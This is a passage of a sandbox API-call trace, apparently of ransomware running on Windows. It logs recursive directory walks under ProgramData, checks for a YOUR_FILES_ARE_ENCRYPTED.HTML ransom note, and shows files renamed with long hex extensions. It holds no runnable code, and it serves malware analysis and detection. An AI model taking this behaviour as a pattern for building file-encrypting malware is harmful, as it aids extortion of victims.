users\\microsoft\\drm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.964] GetProcessHeap () returned 0x600000 [0109.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.964] GetProcessHeap () returned 0x600000 [0109.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.965] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0109.965] StrStrIW (lpFirst="IdentityCRL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.965] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned 44 [0109.965] GetProcessHeap () returned 0x600000 [0109.965] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.966] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL" [0109.966] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*" [0109.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae7d569c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.966] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae7d569c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.966] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae86a5f6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae86a5f6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="INT", cAlternateFileName="")) returned 1 [0109.966] StrStrIW (lpFirst="INT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.966] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT") returned 48 [0109.966] GetProcessHeap () returned 0x600000 [0109.966] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.967] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT" [0109.967] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*" [0109.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae86a5f6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae86a5f6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName=".", cAlternateFileName="")) returned 0x626638 [0109.967] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae86a5f6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae86a5f6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName="..", cAlternateFileName="")) returned 1 [0109.968] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xae86fff1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x5ed8, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName="ppcrlconfig600.dll.9B76D51A5E286AB163F5A241F643DFD3EFB2A387F1728D50E87158CA69CF1767", cAlternateFileName="PPCRLC~1.9B7")) returned 1 [0109.968] StrStrIW (lpFirst="ppcrlconfig600.dll.9B76D51A5E286AB163F5A241F643DFD3EFB2A387F1728D50E87158CA69CF1767", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.968] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll.9B76D51A5E286AB163F5A241F643DFD3EFB2A387F1728D50E87158CA69CF1767") returned 132 [0109.968] PathFindExtensionW (pszPath="ppcrlconfig600.dll.9B76D51A5E286AB163F5A241F643DFD3EFB2A387F1728D50E87158CA69CF1767") returned=".9B76D51A5E286AB163F5A241F643DFD3EFB2A387F1728D50E87158CA69CF1767" [0109.968] lstrlenW (lpString=".9B76D51A5E286AB163F5A241F643DFD3EFB2A387F1728D50E87158CA69CF1767") returned 65 [0109.968] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae774faa, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae774faa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae77a000, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.968] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae774faa, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae774faa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae77a000, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.968] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0109.968] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0109.968] GetProcessHeap () returned 0x600000 [0109.968] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\int\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.968] GetProcessHeap () returned 0x600000 [0109.969] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.969] GetProcessHeap () returned 0x600000 [0109.969] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.969] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae7ae53c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7ae53c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="production", cAlternateFileName="PRODUC~1")) returned 1 [0109.969] StrStrIW (lpFirst="production", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.969] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production") returned 55 [0109.969] GetProcessHeap () returned 0x600000 [0109.969] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.970] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production" [0109.970] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*" [0109.970] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae7ae53c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7ca6d4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0109.971] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae7ae53c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7ca6d4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName="..", cAlternateFileName="")) returned 1 [0109.971] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xae7b5377, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x86c0, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName="ppcrlconfig600.dll.CD14C12384A0F27FAD30CCEA50BA446FF3B2760079076387E2A1D21F68B72900", cAlternateFileName="PPCRLC~1.CD1")) returned 1 [0109.971] StrStrIW (lpFirst="ppcrlconfig600.dll.CD14C12384A0F27FAD30CCEA50BA446FF3B2760079076387E2A1D21F68B72900", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.971] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll.CD14C12384A0F27FAD30CCEA50BA446FF3B2760079076387E2A1D21F68B72900") returned 139 [0109.971] PathFindExtensionW (pszPath="ppcrlconfig600.dll.CD14C12384A0F27FAD30CCEA50BA446FF3B2760079076387E2A1D21F68B72900") returned=".CD14C12384A0F27FAD30CCEA50BA446FF3B2760079076387E2A1D21F68B72900" [0109.971] lstrlenW (lpString=".CD14C12384A0F27FAD30CCEA50BA446FF3B2760079076387E2A1D21F68B72900") returned 65 [0109.971] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName="temp", cAlternateFileName="")) returned 1 [0109.971] StrStrIW (lpFirst="temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.971] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp") returned 60 [0109.971] GetProcessHeap () returned 0x600000 [0109.971] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.972] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp" [0109.972] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*" [0109.972] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0xae7be39d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f9e0, dwReserved1=0x63c420, cFileName=".", cAlternateFileName="")) returned 0x626778 [0109.972] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0xae7be39d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f9e0, dwReserved1=0x63c420, cFileName="..", cAlternateFileName="")) returned 1 [0109.972] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7be39d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7be39d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7c31c4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f9e0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.972] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7be39d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7be39d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7c31c4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f9e0, dwReserved1=0x63c420, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.972] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0109.973] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0109.973] GetProcessHeap () returned 0x600000 [0109.973] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.973] GetProcessHeap () returned 0x600000 [0109.973] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.973] GetProcessHeap () returned 0x600000 [0109.973] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.974] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7c7faf, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7c7faf, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7cf4e0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.974] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7c7faf, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7c7faf, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7cf4e0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c472, dwReserved1=0x63c418, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.974] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0109.974] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0109.974] GetProcessHeap () returned 0x600000 [0109.974] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.975] GetProcessHeap () returned 0x600000 [0109.975] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.975] GetProcessHeap () returned 0x600000 [0109.975] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.975] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7d569c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7d569c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7da486, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.975] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7d569c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7d569c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7da486, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.975] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.976] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0109.976] GetProcessHeap () returned 0x600000 [0109.976] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.976] GetProcessHeap () returned 0x600000 [0109.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.976] GetProcessHeap () returned 0x600000 [0109.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.977] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="MapData", cAlternateFileName="")) returned 1 [0109.977] StrStrIW (lpFirst="MapData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.977] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData") returned 40 [0109.977] GetProcessHeap () returned 0x600000 [0109.977] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.978] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData" [0109.978] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData\\*" [0109.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae7e546a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0109.979] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae7e546a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, 